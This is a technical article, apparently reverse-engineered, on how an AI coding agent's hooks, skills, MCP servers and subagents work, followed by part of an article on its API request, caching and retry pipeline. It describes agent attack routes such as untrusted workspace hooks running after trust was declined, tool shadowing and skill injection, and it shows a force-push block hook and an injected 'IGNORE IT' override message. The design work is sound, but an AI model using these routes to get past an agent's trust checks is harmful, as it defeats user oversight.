Early in development, a vulnerability was discovered: a project's .claude/settings.json could register SessionEnd hooks that executed when the user declined the workspace trust dialog. The user says "I don't trust this workspace" and the workspace's code runs anyway. This led to a blanket rule: all hooks require workspace trust. In interactive mode, no hook executes until the user has explicitly accepted the trust dialog.

Hook Events

Hooks fire at ~28 lifecycle points. The most important ones:

PreToolUse    — Before any tool executes (can block, modify input, or allow)
PostToolUse   — After successful tool execution (can inject context)
Stop          — Before the model stops (can force continuation)
SessionStart  — When a session begins
SessionEnd    — When a session ends (1.5-second timeout, not 10 minutes)
Notification  — When the system sends a notification

Each event carries structured JSON input — the tool name, the tool's input, session IDs, working directory, and more.

Four Hook Types

Command hooks spawn a shell process (bash or PowerShell). The hook's JSON input is written to stdin. The process's exit code determines the outcome:

Exit 0  →  Success (continue normally)
Exit 2  →  Blocking error (prevent the action)
Exit 1  →  Non-blocking error (log and continue)

If the process writes JSON to stdout matching the hook output schema, that JSON controls behavior — permission decisions, additional context, modified tool input. If stdout isn't JSON, it's treated as plain text feedback.

A concrete example: a PreToolUse hook that blocks dangerous git operations:

#!/bin/bash
# Read JSON input from stdin
INPUT=$(cat)
TOOL=$(echo "$INPUT" | jq -r '.tool_name')
COMMAND=$(echo "$INPUT" | jq -r '.tool_input.command // empty')

if [ "$TOOL" = "Bash" ] && echo "$COMMAND" | grep -q "git push.*--force"; then
  echo '{"decision": "block", "reason": "Force push blocked by policy"}'
  exit 2
fi
exit 0

The exit code and JSON output are redundant by design — either mechanism can block. Exit code 2 without JSON still blocks. JSON {"decision": "block"} without exit code 2 still blocks. This redundancy means a hook that crashes mid-output (writing partial JSON) still has the exit code as a fallback signal.

On Windows, command hooks run through Git Bash, not cmd.exe. Every path in environment variables is converted from Windows format (C:\Users\foo) to POSIX format (/c/Users/foo) — Git Bash can't resolve Windows paths. PowerShell hooks skip this conversion and receive native paths.

Prompt hooks send the hook input to a fast model (Haiku by default) with a structured output schema: {ok: boolean, reason?: string}. No tool access. 30-second timeout. The LLM evaluates whether the action should proceed — useful when the decision requires judgment ("is this API call secure?") rather than deterministic checking. Thinking is disabled to reduce cost and latency.

Agent hooks are multi-turn: they spawn a restricted agent that can use tools (Read, Bash) to investigate, then must call a synthetic output tool with {ok, reason}. 60-second timeout, 50-turn limit. The agent can read test output, check file contents, then make a judgment. Its tool pool is filtered — no subagent spawning, no plan mode — to prevent recursive agent creation. If the agent hits 50 turns without producing structured output, it's cancelled silently — a fail-safe against infinite loops.

HTTP hooks POST the JSON input to a URL. SSRF protection blocks private/link-local IP ranges (except loopback). No redirects are followed (maxRedirects: 0). Header values support environment variable interpolation, but only from an explicit allowlist — $SECRET_TOKEN only resolves if SECRET_TOKEN is in the hook's allowedEnvVars array. Unresolved variables expand to empty strings, preventing accidental exfiltration. CRLF and NUL bytes are stripped from header values to prevent header injection attacks.

HTTP hooks are blocked for SessionStart and Setup events in headless mode — the sandbox callback would deadlock because the structured input consumer hasn't started yet when these hooks fire.

Pattern Matching

Hooks can filter by event subtype. A PreToolUse hook with matcher "Write|Edit" only fires for file writes and edits. Matchers support:

Simple strings: "Write" (exact match)
Pipe-separated: "Write|Edit" (multiple exact matches)
Regex patterns: "^Bash.*" (full regex)

An additional if condition supports permission-rule syntax: "Bash(git *)" only fires for bash commands starting with git.

Aggregation and Priority

Multiple hooks can fire for the same event. Results are aggregated with a strict priority:

1. Any hook returns "deny"    → action is blocked (deny wins)
2. Any hook returns "allow"   → action is allowed (if no deny)
3. Any hook returns "ask"     → prompt the user
4. Default                    → normal permission flow

A single deny from any hook overrides all allows. This is the fail-closed property: a security hook can't be overridden by a convenience hook.

Configuration Snapshot

Hook configurations are captured at startup into a frozen snapshot. Settings changes during the session update the snapshot, but the hooks that actually execute come from this snapshot — not from a live re-read of settings files. This prevents a TOCTOU attack where a process modifies .claude/settings.json between the trust check and hook execution.

Enterprise policy can lock hooks to managed-only (allowManagedHooksOnly), meaning only admin-defined hooks execute. Non-managed settings can't override this — the check happens in the snapshot capture, not at execution time.

Trade-Off: Safety Over Convenience

SessionEnd hooks get a 1.5-second timeout (configurable via environment variable), not the 10-minute default. The reasoning: session teardown must be fast. A hook that takes 30 seconds to run would make "close the terminal" feel broken. This means complex cleanup (uploading logs, syncing state) must be designed to complete quickly or run asynchronously — a constraint that occasionally frustrates users but keeps the exit path responsive.

Layer 3: Skills — Reusable Prompt Modules

The Problem It Solves

You have a 500-line review checklist, a commit message template, or a complex deployment procedure. You want the model to follow it exactly when invoked, but you don't want it consuming context on every turn.

Progressive Disclosure

Skills use a three-level disclosure strategy to manage context:

Level 1 — Metadata only (always loaded): The skill's name, description, and when_to_use field are injected into the system prompt's skill listing. This costs ~50-100 tokens per skill. A budget cap (1% of context window, ~8KB) limits total skill metadata — if you have 200 skills, descriptions get truncated. Bundled skills (compiled into the binary) are never truncated; user skills are truncated first.

Level 2 — Tool prompt: When the model decides to invoke a skill, it calls the Skill tool with the skill name. The tool validates the name, checks permissions, and returns a "launching skill" placeholder.

Level 3 — Full content: The skill's complete markdown body is loaded, argument substitution is applied ($1, $2, ${CLAUDE_SESSION_ID}), inline shell commands are executed (if not from an MCP source), and the result is injected as new conversation messages. Only now does the full 500-line checklist enter the context.

This means 200 skills cost ~8KB of ongoing context, and only the invoked skill's full body enters the conversation.

Skill Format

A skill lives in a directory: .claude/skills/my-skill/SKILL.md. The file uses YAML frontmatter:

---
description: Review code for security vulnerabilities
allowed-tools: Bash, Read, Grep
model: opus
paths: src/security/**
context: fork
---

Review the following code for OWASP Top 10 vulnerabilities...

Key frontmatter fields:

allowed-tools — which tools the skill can use (added to permission rules)
model — model override (opus, sonnet, haiku, or inherit)
paths — conditional activation (skill only available when working on matching files)
context: fork — execute in an isolated subagent instead of inline
user-invocable — whether the user can type /skill-name (default: true)
hooks — scoped hooks that only apply during skill execution

Conditional Skills

Skills with paths frontmatter start dormant. They're stored in a separate map, not exposed to the model. When a file operation touches a path matching the skill's pattern, the skill activates — it moves to the dynamic skills map and becomes available. This is the same gitignore-style matching used by CLAUDE.md conditional rules.

Why not just load all skills? Token budget. A project with 50 path-specific skills would waste context on skills irrelevant to the current work. Conditional activation means the model only sees skills relevant to the files it's actually touching.

Dynamic Discovery

When the model reads or writes a file in a subdirectory, the system walks upward from that file looking for .claude/skills/ directories. Newly discovered skill directories are loaded and merged into the dynamic skills map. This enables monorepo patterns where each package has its own skills.

Security: discovered directories are checked against .gitignore. A skill directory inside node_modules/ is skipped — this prevents dependency packages from injecting skills.

Inline Shell Execution

Skills can contain inline shell commands using ! syntax:

Current git branch: !`git branch --show-current`

When the skill body is loaded, these commands execute and their output replaces the command syntax. MCP-sourced skills (remote, potentially untrusted) have shell execution disabled entirely — a hard security boundary. The check is a simple conditional: if the skill's loadedFrom field is 'mcp', shell execution is skipped.

Permission Model

The first time a skill is invoked by the model, the user is prompted. The permission check supports:

Deny rules (exact or prefix match) → block permanently
Allow rules (exact or prefix match) → allow permanently
"Safe properties" auto-allow → skills that only set metadata (model, effort) and don't add tools or hooks are auto-approved

Default: ask. Unknown skills always prompt.

Bundled Skill Security

Skills compiled into the binary extract their reference files to a temporary directory at runtime. The extraction uses O_EXCL | O_NOFOLLOW flags (POSIX) — the file must not already exist and symlinks are rejected. A per-process nonce in the directory path prevents pre-created symlink attacks. Path traversal protection rejects absolute paths and .. components.

Layer 4: The Tool Pool — Assembly and Permissions

The Problem It Solves

The model needs a unified set of tools — built-in (Read, Write, Bash, Agent) plus external (MCP servers, IDE integrations). But which tools are available, and who controls access?

Assembly

The tool pool is assembled from two sources:

built_in_tools = get_registered_tools(permission_context)
mcp_tools = filter_by_deny_rules(all_mcp_tools, permission_context)
pool = deduplicate(sort(built_in_tools) + sort(mcp_tools), by_name)

Three properties are maintained:

Built-ins always win — if an MCP tool has the same name as a built-in, the built-in takes precedence (deduplication preserves first occurrence)
Stable sort order — tools are sorted alphabetically within each partition, keeping built-ins as a contiguous prefix. This is critical for prompt caching: the server places a cache breakpoint after the last built-in tool. If MCP tools interleaved with built-ins, adding one MCP tool would invalidate all cached tool definitions downstream.
Deny rules are absolute — a tool in the deny list is removed regardless of source

MCP Tool Namespacing

External tools are namespaced to prevent collisions:

mcp__github__create_issue
mcp__jira__create_ticket

The pattern is mcp__<server>__<tool>. Server and tool names are normalized: dots, spaces, and special characters become underscores. This namespacing means an MCP server can't shadow a built-in tool — mcp__evil__Read is a different tool from Read.

IDE Tool Filtering

IDE extensions connect via MCP but have restricted access. Only two specific IDE tools are exposed to the model — the rest are blocked. This prevents an IDE extension from registering a tool named Bash that bypasses the bash security analyzer.

Layer 5: MCP — External Tool Servers

The Problem It Solves

You want to give the model access to your internal APIs, databases, or third-party services. These capabilities live in separate processes — potentially remote — and need their own lifecycle, authentication, and error recovery.

Transport Types

MCP servers connect via six transport types:

stdio — local child process (default, most common)
SSE — Server-Sent Events (authenticated remote)
HTTP — Streamable HTTP (MCP spec 2025-03-26)
WebSocket — bidirectional streaming
SDK — in-process (managed by the SDK)
claude.ai proxy — remote servers bridged through a proxy with OAuth

Configuration Hierarchy

Like CLAUDE.md, MCP server configs merge from multiple sources:

Enterprise    → exclusive control when present (blocks all others)
Local         → .claude/mcp.json in working directory
Project       → claude.json in project root
User          → ~/.claude/mcp.json
Dynamic       → SDK-provided servers

When an enterprise config exists, it has total control. Other scopes are blocked. This is the nuclear option for organizations that need to control exactly which external services the model can access.

Enterprise Allowlist/Denylist

Policy settings define three types of allowlist entries:

Name-based: {serverName: "github"}
Command-based: {serverCommand: ["node", "path/to/mcp.js"]} (for stdio servers)
URL-based: {serverUrl: "https://mcp.example.com"} (for remote servers)

The denylist always wins. A server matching any deny entry is blocked regardless of allowlist membership. If the allowlist exists but is empty, all servers are blocked. If the allowlist is undefined, all servers are allowed. This three-state logic (undefined/empty/populated) gives administrators precise control.

Connection and Timeout

Servers are connected with a 30-second timeout. Connection is batched: 3 local servers in parallel, 20 remote servers in parallel. If a server fails to connect, it enters a failure state but doesn't block other servers.

Tool calls have a separate timeout — nearly 28 hours by default (configurable). This allows long-running operations (database migrations, large builds) without arbitrary cutoffs. Progress is logged every 30 seconds so the user knows something is happening.

Session Expiry and Recovery

Remote servers have stateful sessions. When a session expires, the server returns a 404 with JSON-RPC error code -32001, or the connection closes with error -32000. The client detects both cases, clears the connection cache, and throws a session-expired error. The next tool call will transparently reconnect.

Authentication failures (401) follow a parallel path: the client status updates to "needs-auth," tokens are cached with a 15-minute TTL, and the next connection attempt triggers a token refresh. OAuth flows support step-up authentication — a 403 response triggers a re-authentication challenge before the SDK's default handler fires.

A more subtle failure: URL elicitation. Some MCP servers require the user to visit a URL to authorize an action (OAuth consent, MFA challenge). The server returns error code -32042 with a completion URL. The client emits an elicitation request, waits indefinitely for the user to complete the flow, then retries the original tool call. This is a blocking wait — but since it's triggered by a user-facing auth requirement, the blocking is intentional.

Error Boundaries

MCP server errors never contain sensitive data. All error messages are wrapped in a telemetry-safe type that strips user code and file paths. Server stderr is buffered to a 64 MB cap to prevent unbounded memory growth from a chatty or malicious server. When a stdio server crashes (ECONNRESET), the error message says "Server may have crashed or restarted" — not the actual stderr contents.

Layer 6: Agents — Delegated Execution

The Problem It Solves

You want the model to research a codebase in the background while you keep working. You want it to delegate a complex task to a specialist (an "Explore" agent that only searches, a "Plan" agent that only designs). You want multiple agents working in parallel on different parts of a refactor.

Three Execution Models

Synchronous subagents share the parent's abort controller. When the user presses Ctrl+C, both parent and child stop. The child's state mutations (tool approvals, file reads) propagate to the parent via shared setAppState. The child runs inline — the parent waits for it to finish.

Async background agents get their own abort controller. The parent continues working. The child's state mutations are isolated — a separate denial counter, separate tool decisions. When the child finishes, its result is delivered as a notification. Permission prompts are auto-denied (the child can't show UI) unless the agent runs in "bubble" mode, where prompts surface in the parent's terminal.

Teammates are full separate processes (via tmux split-pane or iTerm2) or in-process runners isolated via AsyncLocalStorage. Each teammate has its own conversation history, its own model, its own abort controller. Communication happens through a file-based mailbox — JSON messages written to a shared team directory. The team lead writes a prompt to a teammate's inbox; the teammate polls it.

Context Isolation

Every agent gets its own ToolUseContext — a structure containing the conversation, tool pool, permissions, abort controller, file state cache, and callbacks. The isolation strategy:

readFileState     → cloned (cache sharing for prompt cache hits)
abortController   → shared (sync) or new (async)
setAppState       → shared (sync) or no-op (async)
messages          → stripped for teammates (they build their own)
tool decisions    → fresh (no leaking parent's approve/deny history)
MCP clients       → merged (parent + agent-specific servers)

The critical insight is that cloning readFileState isn't about correctness — it's about cache hits. When a forked agent makes an API call, the server checks whether the message prefix matches a cached prefix. If the fork and parent have different file state caches, they'll make different tool-result replacement decisions, producing different message bytes and missing the cache. Cloning ensures byte-identical prefixes.

Cache-Safe Forking

After every turn, the parent saves its "cache-safe parameters" — system prompt, user context, system context, tool definitions, and conversation messages. When a fork is created, it retrieves these parameters and uses them directly. The fork's API request starts with a byte-identical prefix, and only the fork's new prompt differs. The server recognizes the shared prefix and reads it from cache — potentially saving 90%+ on input costs for the fork.

This is why fork children inherit the parent's exact tool pool (useExactTools: true) and thinking config. Changing even one tool definition would alter the tool schema bytes, breaking the prefix match.

Tool Filtering

Each agent definition can specify allowed and disallowed tools:

tools: [Read, Grep, Glob, Bash]          → only these tools available
disallowed_tools: [Write, Edit, Agent]    → these removed from pool

The resolution:

Start with the full tool pool
If tools is specified and not ['*'], filter to only listed tools (plus always-included tools like the stop tool)
Remove any tools in disallowed_tools
Remove agent-disallowed tools (Agent tool itself for non-fork agents, plan mode tools)

Read-only agents like Explore and Plan additionally skip CLAUDE.md (saves ~5-15 Gtok/week fleet-wide) and git status (stale snapshot, they'll run git status themselves if needed).

Permission Bubbling

When an agent needs a permission decision:

Sync agents: The prompt surfaces in the parent's terminal. The user approves or denies. The decision propagates to the child's permission context.
Async agents in bubble mode: Same as sync — the prompt surfaces in the parent's terminal, but the agent waits asynchronously. Automated checks (permission classifier, hooks) run first; the user is only interrupted when automation can't resolve it.
Async agents without bubble: Permissions are auto-denied. The agent must work within its pre-approved tool rules.
Teammates: Permission mode is inherited via CLI flags when spawning the process. --dangerously-skip-permissions propagates — but not when plan mode is required (a safety interlock).

Fork Recursion Guard

Fork children keep the Agent tool in their tool pool (for cache-identical tool definitions), but recursive forking is blocked at call time. The system scans the conversation history for a boilerplate tag injected into every fork child's first message. If found, the agent is already a fork — further forking is rejected.

The boilerplate itself is instructive. Every fork child receives a message that begins:

STOP. READ THIS FIRST.

You are a forked worker process. You are NOT the main agent.

RULES (non-negotiable):
1. Your system prompt says "default to forking." IGNORE IT — that's for
   the parent. You ARE the fork. Do NOT spawn sub-agents; execute directly.
2. Do NOT converse, ask questions, or suggest next steps
3. USE your tools directly: Bash, Read, Write, etc.
...

This prompt engineering is a defense-in-depth against the model's tendency to delegate. The system prompt (inherited from the parent for cache reasons) may contain instructions to fork work. The boilerplate overrides those instructions at the conversation level — later in the message sequence, higher priority.

Worktree Isolation

Agents can be spawned with isolation: "worktree", which creates a separate git worktree — a full copy of the repository on a separate branch. The agent operates in this isolated copy: writes don't affect the parent's files, and the parent's subsequent edits don't corrupt the agent's state.

When a worktree agent inherits conversation context from the parent, all file paths in that context refer to the parent's working directory. The system injects a notice telling the agent to translate paths, re-read files before editing (they may have changed since the parent saw them), and understand that changes are isolated.

Max Turns and Cleanup

Every agent has a turn limit (default varies by agent type, capped by definition). When the limit is reached, the agent receives a max_turns_reached attachment and stops. The cleanup sequence:

1. Close agent-specific MCP servers (only newly created ones, not shared)
2. Remove scoped hooks registered by the agent's frontmatter
3. Clear prompt cache tracking state
4. Release cloned file state cache
5. Free conversation messages (GC)
6. Remove Perfetto trace registration
7. Clear transcript routing
8. Kill background bash tasks spawned by this agent

This cleanup happens in a finally block — it runs whether the agent succeeded, failed, or was aborted.

The Full Pipeline

When you type a message, here's what happens to the extension systems:

1. CLAUDE.md files discovered and loaded (6-tier hierarchy)
   → Instructions injected as system-reminder in user message

2. UserPromptSubmit hooks fire
   → Can block the prompt, inject additional context, or modify it

3. System prompt assembled with skill metadata
   → ~50-100 tokens per skill, budget-capped at 1% of context

4. Tool pool assembled (built-in + MCP, sorted, deduplicated)
   → Deny rules applied, built-ins win on name conflict

5. Model generates response, calls tools
   → PreToolUse hooks fire before each tool (can block, allow, modify input)
   → PostToolUse hooks fire after each tool (can inject context)

6. Model invokes a Skill
   → Permission check → full body loaded → argument substitution
   → Shell commands executed (unless MCP source) → content injected

7. Model spawns an Agent
   → Isolated context created → tools filtered → MCP servers merged
   → Hooks scoped → query loop runs → results returned

8. Session ends
   → SessionEnd hooks fire (1.5-second timeout)
   → MCP servers disconnected → agent cleanup

Every layer is fail-closed. Unknown CLAUDE.md extensions are skipped. Unknown hook events are ignored. Unknown skill types are rejected. Unknown MCP tools are filtered by deny rules. Unknown agent types are blocked at validation. The system doesn't need to anticipate every new extension type — it only needs to correctly handle the ones it explicitly supports. Everything else gets a "no."

The alternative — a blocklist approach where you enumerate what's dangerous — means every new extension type is a zero-day. The allowlist approach means every new extension type starts with "ask the user." That's the fundamental trade-off: a slight friction on adoption in exchange for a structural guarantee that surprises are visible.

What Happens When Claude Code Calls the API

Laurent DeSegur — Wed, 08 Apr 2026 02:27:32 +0000

The Problem

You type a message. The model needs to see it, along with every previous message, the system prompt, tool schemas, and various configuration. That context gets serialized into an HTTP request, sent to a remote server, and a response streams back as server-sent events. Simple enough — until you consider everything that can go wrong.

The server can be overloaded (529). Your credentials can expire mid-session. The response can be too long for the context window. The connection can go stale. The server can tell you to back off for five minutes, or five hours. The model can try to call a tool that failed three turns ago. Your cache — the thing saving you 90% on input costs — can silently break because a tool schema changed.

The naive approach is: send request, get response, show to user. One function, maybe a try/catch. This fails because a single API call in an agentic loop is not a one-shot operation. It's the inner loop of a system that runs for hours, making hundreds of calls, where each call builds on the state of every previous call. A retry strategy that works for a one-shot chatbot (wait and retry) causes cascading amplification in a capacity crisis. A token counter that's off by 5% will eventually overflow the context window. A cache break you don't detect silently triples your costs.

The design principle is defense in depth with fail-visible defaults. Every failure should either be recovered automatically or surfaced to the user with a specific recovery action. Silent failures — where the system degrades without anyone noticing — are the enemy. Cache breaks get detected and logged. Token counts get cross-checked against API-reported usage. Retry decisions consider not just "can we retry" but "should we, given what everyone else is doing right now."

This article traces the full client-side pipeline: request construction, caching, retries, streaming, error recovery, cost tracking, and rate limit management. Everything here is verifiable from the source code. The server side — tokenization, routing, inference, post-processing — is invisible to the client and won't be covered.

Building the Request

The System Prompt

Consider what the model needs to know before it sees your message. Its identity, its behavioral rules, what tools it has, how to use them, what tone to take, what language to write in, what project it's working on, what it remembered from previous sessions, what MCP servers are connected. This is the system prompt — a multi-kilobyte payload assembled from ~15 separate section generators.

The prompt has a deliberate physical layout. Everything that stays constant across turns — identity, coding guidelines, tool instructions, style rules — sits at the top. Everything that changes per turn — memory, language preferences, environment info, MCP instructions — sits at the bottom, after an internal boundary marker.

Why this split? The API caches the prompt prefix. On turn 2, the server recognizes the cached prefix and reads it cheaply. If a dynamic section (say, updated memory) sat in the middle, it would invalidate everything after it. By putting all dynamic content at the end, the stable prefix stays cached and only the changing tail incurs write costs.

The system prompt also has a priority hierarchy. An override replaces everything (used by the API parameter). Otherwise: agent-specific prompts (for subagents) > custom prompts (user-specified) > default prompt. An append prompt (from settings like CLAUDE.md) is always added at the end, regardless of which base prompt was selected. This means your CLAUDE.md instructions survive even when the system switches to a subagent prompt.

Messages

The internal conversation history is a rich format with UUIDs, timestamps, tool metadata, and attachment links. The API expects a simpler format: alternating user/assistant messages with typed content blocks.

Two conversion functions transform the internal format. Both clone their content arrays before modification — a defensive pattern that prevents the API serialization layer from accidentally mutating the in-memory conversation state. This matters because the same message objects get reused across retry attempts and displayed in the UI.

Before conversion, messages pass through a compression pipeline that runs on every API call:

Tool result budgeting — Caps the total size of tool results per message. A tool that returned 50KB of output gets truncated.
History snipping — Removes the oldest messages when the conversation exceeds a threshold.
Microcompaction — Clears stale tool results (file reads, shell output, search results) when the prompt cache has expired and they'll be re-tokenized anyway.
Context collapse — Applies staged summarization to older conversation segments.
Autocompaction — Full model-based conversation summary when approaching the context limit.

After conversion, additional cleanup runs:

Tool result pairing — Every tool_use block from the model must have a matching tool_result. Orphaned tool uses (from aborts, fallbacks, or compaction) get synthetic placeholder results. The API rejects unpaired blocks, and this failure mode is subtle enough that it has dedicated diagnostic logging.
Media stripping — Caps total media items (images, PDFs) at 100 per request. Earlier items are stripped first. This prevents conversations that accumulate many screenshots from exceeding payload limits.

Prompt Caching

Caching is the most financially significant optimization. On a long session, 90%+ of input tokens may be cache reads. The difference: on a $5/Mtok model, cache reads cost $0.50/Mtok — a 90% discount.

The client places cache markers (cache_control directives) at two levels:

System prompt blocks: Every block gets a marker. The server caches them as a unit.
Message history: A single breakpoint at the last message (or second-to-last if skip-write is set). Everything before this point is eligible for caching.

Tool results that appear before the cache breakpoint get cache_reference tags linking them to their tool use IDs. This enables server-side cache editing — the server can delete a specific cached tool result without invalidating the entire prefix. This is how the system reclaims space from old tool results while keeping the cache warm.

Cache control details vary by eligibility:

type: ephemeral
ttl: 5 minutes (default) or 1 hour (for eligible users)
scope: global (shared across sessions) or unset

The 1-hour TTL is gated on subscriber status (not in overage) AND an allowlist of query sources. The allowlist uses prefix matching — repl_main_thread* covers all output style variants. This prevents background queries (title generation, suggestions) from claiming expensive 1-hour cache slots.

Tools, Thinking, and Extra Parameters

Each tool gets serialized to a JSON schema with name, description, and input schema. MCP tools can be deferred — the model sees the tool name but requests full details on demand, reducing the upfront token cost when dozens of MCP tools are connected.

Thinking has three modes. Adaptive: the model decides how much to reason (latest models only). Budget: a fixed token budget for thinking. Disabled: no thinking blocks. When thinking is enabled, the API rejects requests that also set temperature, so the client forces temperature to undefined.

The request body also carries: a speed parameter for fast mode (same model, faster inference, higher cost), an effort level, structured output format, task budgets for auto-continuation, feature flag beta headers, and extra body parameters parsed from an environment variable (for enterprise configurations like anti-distillation).

The Actual Call

create(
  parameters + { stream: true },
  options: { abort_signal, headers: { client_request_id: random_uuid } }
).with_response()

Always streaming. Always with an abort signal. The .with_response() call extracts both the event stream and the raw HTTP response object. The raw response is needed for header inspection — rate limit status, cache metrics, and request IDs all come from response headers, not the stream body.

The client request ID is a UUID generated per call. It exists because timeout errors return no server-side request ID. When a request times out after 10 minutes, this is the only way to correlate the client failure with server-side logs.

The Client

Before any request fires, a factory function creates the SDK client. The client is provider-specific:

Direct API: API key or OAuth token authentication
AWS Bedrock: AWS credentials (bearer token, IAM, or STS session)
Azure Foundry: Azure AD credentials or API key
Google Vertex AI: Google Application Default Credentials with per-model region routing

All four providers return the same base type, so downstream code doesn't branch on provider. The provider-specific complexity is confined to the factory.

A design trade-off in the Vertex setup: the Google auth library's auto-detection hits the GCE metadata server when no credentials are configured, which hangs for 12 seconds on non-GCE machines. The client checks environment variables and credential file paths first, only falling back to the metadata-server path when neither is present. This trades a longer code path for avoiding a 12-second hang in the common case.

Every request carries session-identifying headers: an app identifier (cli), a session ID, the SDK version, and optionally a container ID for remote environments. Custom headers from an environment variable (newline-separated Name: Value format) are merged in. For first-party API calls, the SDK's fetch function is wrapped to inject the client request ID and log the request path for debugging.

Streaming

What the User Sees

While the API call is in flight, the user sees a spinner with live feedback. The spinner shows the current mode ("Thinking...", "Reading files...", "Running tools..."), an approximate token count updated in real-time as stream chunks arrive, and the elapsed time. If the stream stalls for more than 3 seconds, the spinner changes to indicate the stall visually. If the stall exceeds 30 seconds, the UI offers a contextual tip.

During retries, the user sees a countdown: "Retrying in X seconds..." with the current attempt number and maximum retries. This is the retry generator's yielded status messages being rendered — the async generator architecture means the UI stays responsive even during long backoff waits.

When a rate limit warning is active, the notification bar shows utilization percentage and reset time. When context runs low, a token warning shows remaining capacity and distance to the auto-compact threshold. When a model fallback occurs, a system message appears explaining the switch.

All of this feedback comes from the same event stream — the query loop yields events (stream chunks, retry status, error messages, compaction summaries) and the UI renders them in real-time. Nothing blocks on the complete response.

The Event Protocol

The response arrives as server-sent events:

message_start     → initialize, extract initial usage
content_block_start → begin text / thinking / tool_use block
content_block_delta → accumulate content chunks
content_block_stop  → finalize block
message_delta     → update total usage, set stop reason
message_stop      → end of stream

Text deltas are concatenated. Tool use inputs arrive as JSON fragments that are reassembled into a complete JSON object by the final content_block_stop. Thinking blocks accumulate both thinking text and a cryptographic signature (for verification).

The Idle Watchdog

A timer tracks the interval between stream chunks. If no data arrives for 90 seconds, the request is aborted. A warning fires at 45 seconds. This catches a failure mode that TCP timeouts don't: the connection is alive (TCP keepalives succeed) but the server has stopped sending data. Without the watchdog, the client would hang silently for the full 10-minute request timeout.

The 90-second threshold is configurable via environment variable. The trade-off: too short and you abort legitimate long-thinking responses; too long and you waste minutes on hung connections.

Streaming Tool Execution

When the model emits a tool use block, tool execution can start immediately — while the model might still be generating text or additional tool calls. If the model makes three tool calls and each takes 5 seconds, sequential execution adds 15 seconds. With streaming execution, the first tool starts as soon as it's emitted, and all three may finish by the time the response completes.

If a model fallback occurs mid-stream (3 consecutive overload errors trigger a switch to a fallback model), the streaming executor's pending results are discarded. Tools are re-executed after the fallback response arrives. This prevents stale results from a partially-failed request from contaminating the fallback response.

Resource Cleanup

When streaming ends — normally, on error, or on abort — the client explicitly releases resources: the SDK stream object is cleaned up, and the HTTP response body is cancelled. This is a defensive pattern against connection pool exhaustion. In a long session with hundreds of tool loops, each API call opens a connection. Without explicit cleanup, idle connections accumulate until the pool is full and new requests fail with connection errors.

Post-Response Recovery

When the model responds but the response is problematic (no tool calls, but an error condition), the query loop has fallback strategies before surfacing the error:

Prompt too long: First, drain any staged context collapses. If that doesn't free enough space, try reactive compaction — an aggressive, single-shot compression of the conversation. If that also fails, surface the error with a /compact hint.
Max output tokens hit: First, try escalating from 8K to 64K output tokens (one-time). If still hitting limits, inject a "Resume directly from where you left off" message and retry. Maximum 3 retries. This handles the case where the model's response is legitimately long (a large code generation) rather than pathologically stuck.
Media size errors: Try reactive compaction with media stripping — removing images and documents that pushed the request over the payload limit.

Each strategy is tried once per error type. The system doesn't loop on recovery.

The Retry Wrapper

Every API call is wrapped in a retry generator. It yields status messages during waits (so the UI can show "Retrying in X seconds...") and returns the final result on success.

The Decision Tree

When an error occurs, the handler walks through a priority-ordered sequence:

User abort → Throw immediately. No retry.

Fast mode + rate limit (429) or overload (529) → Check the retry-after header:

Under 20 seconds: Wait and retry at fast speed. This preserves the prompt cache — switching speed would change the model identifier and break the cache.
Over 20 seconds or unknown: Enter a cooldown period (minimum 10 minutes). During cooldown, requests use standard speed. This prevents spending 6x the cost on retries during extended overload.
If the server signals that overage isn't available (via a specific header), fast mode is permanently disabled for the session.

Overload (529) from a background source → Drop immediately. Background work (title generation, suggestions, classifiers) doesn't deserve retries during a capacity crisis. Each retry is 3–10x gateway amplification. The user never sees background failures anyway. New query sources default to no-retry — they must be explicitly added to a foreground allowlist.

Consecutive 529 counter → After 3 consecutive overload errors, trigger a model fallback if one is configured. The counter persists across streaming-to-nonstreaming fallback transitions (a streaming 529 pre-seeds the counter for the non-streaming retry loop). Without a fallback model, external users get "Repeated 529 Overloaded errors" and the request fails.

Authentication errors → Re-create the entire SDK client. OAuth token expired (401)? Refresh it. OAuth revoked (403 + specific message)? Force re-login. AWS credentials expired? Clear the credential cache. GCP token invalid? Refresh credentials. The retry gets a fresh client with fresh credentials.

Stale connection (ECONNRESET/EPIPE) → Disable HTTP keep-alive (behind a feature flag) and reconnect. Keep-alive is normally desirable, but a stale pooled connection that repeatedly resets is worse than the overhead of new connections.

Context overflow (input + max_tokens > limit) → Parse the error for exact token counts, calculate available space with a safety buffer, adjust the max_tokens parameter, and retry. A floor of 3,000 tokens prevents the model from having zero room to respond. If thinking is enabled, the adjustment ensures the thinking budget isn't silently eliminated.

Everything else → Check if retryable (connection errors, 408, 409, 429, 5xx → yes; 400, 404 → no). Calculate delay. Sleep. Retry.

Backoff

base_delay = min(500ms * 2^(attempt-1), max_delay)
jitter = random() * 0.25 * base_delay
delay = base_delay + jitter

The jitter is 0-25% of the base, preventing thundering herd when many clients retry simultaneously. If the server sends a Retry-After header, that value overrides the calculated delay.

Three backoff modes exist:

Normal: Up to 10 attempts, max delay grows with attempts.
Persistent (headless/unattended sessions): Retries 429 and 529 indefinitely with a 5-minute cap. Long sleeps are chunked into 30-second intervals, and each chunk yields a status message so the host environment doesn't kill the session for inactivity. A 6-hour absolute cap prevents pathological loops.
Rate-limited with reset timestamp: The server sends an anthropic-ratelimit-unified-reset header with the Unix timestamp when the rate limit window resets. The client sleeps until that exact time rather than polling with exponential backoff.

The x-should-retry Header

The server can explicitly tell the client whether to retry via x-should-retry: true|false. But the client doesn't always obey:

Subscribers hitting rate limits: The server says "retry: true" (the limit resets in hours). But the client says no — waiting hours is not useful. Enterprise users are an exception because they typically use pay-as-you-go rather than window-based limits.
Internal users on 5xx errors: The server may say "retry: false" (the error is deterministic). But internal users can ignore this for server errors specifically, because internal infrastructure sometimes returns transient 5xx errors that resolve on retry.
Remote environments on 401/403: Infrastructure-provided JWTs can fail transiently (auth service flap, network hiccup). The server says "don't retry with the same bad key" — but the key isn't bad, the auth service is flapping. So the client retries anyway.

Each of these is a case where the client has context the server doesn't. The server sees "this request failed with status X." The client knows "I'm a subscriber who can't wait 5 hours" or "my auth is infrastructure-managed, not user-provided."

Error Classification

When retries are exhausted, the error is converted into a user-facing message with a recovery action. Over 20 specific error patterns map to targeted messages:

Pattern	User Sees	Recovery
Context too long with token counts	"Prompt is too long"	`/compact`
Model not available	Subscription-aware message	`/model`
API key invalid	"Not logged in"	`/login`
OAuth revoked	"Token revoked"	`/login`
Credits exhausted	"Credit balance too low"	Add credits
Rate limit with reset time	Per-plan message	Wait or `/upgrade`
